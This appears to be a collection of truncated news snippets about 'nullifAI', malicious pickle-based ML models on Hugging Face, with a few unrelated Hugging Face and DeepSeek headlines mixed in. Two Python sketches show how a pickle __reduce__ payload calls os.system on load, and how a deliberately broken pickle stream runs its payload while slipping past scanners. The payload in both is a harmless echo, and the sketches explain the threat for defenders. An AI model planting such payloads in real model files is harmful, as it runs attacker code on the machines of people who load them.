Cybersecurity researchers found that malware was being distributed on Hugging Face by abusing Pickle file serialisation.
The technique, called nullifAI, allows malicious models to bypass Hugging Face’s protective measures against malicious AI models ...
Researchers discovered two malicious ML models on Hugging Face exploiting “broken” pickle files to evade detection, bypassing ...
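For context on why a shared model file can be dangerous at all: a pickle stream is not passive data but a sequence of instructions that the unpickler executes, and a serialized object can direct it to call arbitrary functions. A minimal sketch of that mechanism follows (the Payload class and the echo command are hypothetical, for illustration only, and are not taken from the samples the researchers found):

```python
import os
import pickle


class Payload:
    """Hypothetical attacker-controlled object, for illustration only."""

    def __reduce__(self):
        # __reduce__ tells the unpickler how to "rebuild" the object:
        # here it asks it to call os.system with an attacker-chosen command.
        return (os.system, ("echo pickle payload executed",))


malicious_bytes = pickle.dumps(Payload())

# Unpickling the bytes resolves os.system and calls it with the command,
# regardless of what the file claims to contain.
pickle.loads(malicious_bytes)
```

Any tool or user that unpickles such a file runs the embedded command, which is why platforms scan uploaded pickle-based models in the first place.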
Hugging Face is a platform for viewing, sharing, and showcasing machine learning models, datasets, and related work. It aims ...
The popular Python Pickle serialization format, which is common for distributing AI models, offers ways for attackers to ...
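One plausible reading of the “broken” pickle files mentioned above is that the unpickler executes opcodes sequentially: a payload placed early in the stream runs before any parse error caused by corrupted trailing data, while a scanner that insists on a complete, well-formed stream may fail to analyze the file. The sketch below illustrates that ordering with a hypothetical payload; it is a simplified illustration of the general principle, not a reconstruction of the actual samples:

```python
import os
import pickle


class Payload:
    """Hypothetical payload, for illustration only."""

    def __reduce__(self):
        return (os.system, ("echo payload ran before the parse error",))


# Protocol 0 keeps the stream to simple ASCII opcodes terminated by STOP ('.').
stream = pickle.dumps(Payload(), protocol=0)

# "Break" the file: drop the STOP opcode and append junk bytes. A scanner
# that requires a complete, well-formed pickle may reject or skip this blob,
# but the unpickler below still executes the payload opcode by opcode
# before it reaches the invalid trailing data.
broken = stream[:-1] + b"\x00junk"

try:
    pickle.loads(broken)  # never unpickle untrusted data
except Exception as exc:
    print("deserialization failed:", exc)
# By this point the echo command has already executed.
```

The error message only appears after the command has run, which illustrates the gap between what a strict parser sees and what the unpickler actually does.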
Hugging Face has launched the integration of four serverless inference providers (Fal, Replicate, SambaNova, and Together AI) directly into its model pages. These providers are also integrated into ...
The initiative comes after DeepSeek’s R1 model stunned the artificial intelligence community by matching the performance of the most capable models built by U.S. firms, despite being built at a fraction of the cost.
Dubbed “nullifAI,” the Tactic for Evading Detection in ML Models Targets Pickle Files, Demonstrating Fast-Growing Cybersecurity Risks Presented by ...